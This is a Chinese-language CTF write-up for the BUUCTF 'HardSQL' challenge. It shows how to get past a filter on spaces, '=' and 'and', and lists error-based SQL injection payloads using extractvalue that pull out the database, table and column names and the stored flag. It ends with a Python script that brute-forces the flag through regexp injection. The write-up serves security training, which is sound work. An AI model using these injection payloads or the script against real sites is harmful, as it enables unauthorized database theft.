BUU26 [极客大挑战 2019]HardSQL1

输入一些SQL关键词,发现空格,=,union,and,by都被过滤了

=被过滤,就用like替代

发现登录成功,可以注入

报错注入

注意

1.这里过滤了空格,就用()将内容包裹起来

比如说:select table_name from information_schema.tables

就可以换成:select(table_name)from(information_schema.tables)

2.过滤了=,where(table_name='geek')语句中的 = 就被过滤了,此时可以用 like 代替:

where(table_name)like('geek')

爆库名:

1'or(extractvalue(1,concat(0x7e,(select(database())))))#

爆表名:

1'or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema

)like('geek')),0x7e)))#

爆列名:这里限制条件只用写table_name=' H4rDsq1**'就行了,因为and被过滤了**

这里注意是(' H4rDsq1**')**

1'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)

where(table_name)like('H4rDsq1')),0x7e)))#

爆password:这里就必须写( H4rDsq1**)**

1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e)))#

但是显示不完整

发现substr也被过滤了,所以使用right或者regexp

right:

1'or(extractvalue(1,concat(0x7e,(select(right(password,20))from(H4rDsq1)),0x7e)))#

拼接起来

regexp:

regexp 是 SQL 中的正则表达式匹配运算符

url地址是直接复制的地址栏的地址,所以存在的都是编码后的字符,其原始语句为:1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)where(password)regexp('^f')),0x7e)))#【筛选出 H4rDsq1 表中 password 字段以 'f' 开头的记录】,可用payload:1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)where(password)regexp('^flag{5e0eabdd-83c3-466f-9e51-bb95d91d23ad}')),0x7e)))#,验证正则匹配方式的正确性,脚本如下:

正则表达式中,^f表示匹配字符串以 f 开头

python 复制代码
import requests  #requests 模块用于发送 HTTP 请求,与目标服务器进行交互。
import time      #time 模块用于添加延迟,避免请求过于频繁导致服务器拒绝。
#去掉了大写字母,可手动加上,ABCDEFGHIJKLMNOPQRSTUVWXYZ
#未写停止判断,当判断到strings最后一位且flag未在其中时停止即可
strings = 'abcdefghijklmnopqrstuvwxyz1234567890{}-_~' #定义了可能出现在 flag 中的字符集
i = 1
flag = ''  #flag 用于存储已经猜测到的部分 flag,初始为空字符串。
while i < 80:
    for one_char in strings:
        one_char = flag + one_char#先把已经猜好的和新遍历的字符拼接起来
        url = "http://4538af48-5b3e-451e-b6bf-565049f2caab.node4.buuoj.cn:81/check.php?username=12&password=1%27or%28extractvalue%281%2Cconcat%280x7e%2C%28select%28password%29from%28H4rDsq1%29where%28password%29regexp%28%27%5E"+str(one_char)+"%27%29%29%2C0x7e%29%29%29%23"
        #将one_char转换成字符串,以这个新猜的字符串为开头看看能不能匹配上真正的flag
        #如果能匹配上,它会返回匹配上的flag{xxxxxxxx}
        #(因为本意是查询有没有符合条件的字符串),所以回显的文本里会有flag字样
        time.sleep(0.05) #暂停 0.05 秒,避免请求过于频繁。
        rs = requests.get(url)
        if 'flag' in rs.text:   #如果响应文本中包含 'flag',说明当前猜测的部分 flag 是正确的,
            flag = one_char
            print("\r", end="") #\r回车
            print('flag为:' + flag, end='')
            break

参考:[极客大挑战 2019]HardSQL-1 - upfine - 博客园

相关推荐
阿里小阿希4 小时前
Vue3 + Element Plus 项目中日期时间处理的最佳实践与数据库设计规范
数据库·设计规范
白鹭5 小时前
MySQL源码部署(rhel7)
数据库·mysql
666和7775 小时前
Struts2 工作总结
java·数据库
还听珊瑚海吗5 小时前
SpringMVC(一)
数据库
星期天要睡觉6 小时前
MySQL 综合练习
数据库·mysql
Y4090016 小时前
数据库基础知识——聚合函数、分组查询
android·数据库
JosieBook7 小时前
【数据库】MySQL 数据库创建存储过程及使用场景详解
数据库·mysql
处女座_三月8 小时前
改 TDengine 数据库的时间写入限制
数据库·sql·mysql